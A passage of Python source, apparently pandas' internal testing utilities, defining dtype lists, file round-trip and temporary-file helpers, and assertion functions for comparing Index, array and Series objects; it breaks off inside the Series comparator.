from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA]
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:119: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"always", _testing_mode_warnings # type: ignore[arg-type]
)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:126: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"ignore", _testing_mode_warnings # type: ignore[arg-type]
)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
# pandas\_testing.py:243: error: Incompatible types in assignment
# (expression has type "IO[Any]", variable has type "BinaryIO")
f = gzip.open(path, "rb") # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:245: error: Incompatible types in assignment
# (expression has type "BZ2File", variable has type "BinaryIO")
f = bz2.BZ2File(path, "rb") # type: ignore[assignment]
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
# pandas\_testing.py:252: error: Incompatible types in assignment
# (expression has type "IO[bytes]", variable has type "BinaryIO")
f = zip_file.open(zip_names.pop()) # type: ignore[assignment]
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
args: Tuple[Any, ...] = (data,)
mode = "wb"
method = "write"
compress_method: Callable
if compression == "zip":
compress_method = zipfile.ZipFile
mode = "w"
args = (dest, data)
method = "writestr"
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_index_equal
>>> a = pd.Index([1, 2, 3])
>>> b = pd.Index([1, 2, 3])
>>> assert_index_equal(a, b)
"""
__tracebackhide__ = True
def _check_types(left, right, obj="Index"):
if exact:
assert_class_equal(left, right, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", left, right, obj=obj)
# allow string-like to have different inferred_types
if left.inferred_type in ("string"):
assert right.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", left, right, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = (
np.sum((left._values != right._values).astype(int)) * 100.0 / len(left)
)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
assert_equal(left._right, right._right, obj=f"{obj}.left", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for left_arr, right_arr in zip(left, right):
# count up differences
if not array_equivalent(left_arr, right_arr, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
Examples
--------
>>> from pandas.testing import assert_extension_array_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b, c = a.array, a.array
>>> assert_extension_array_equal(b, c)
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_series_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b = pd.Series([1, 2, 3, 4])
>>> assert_series_equal(a, b)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
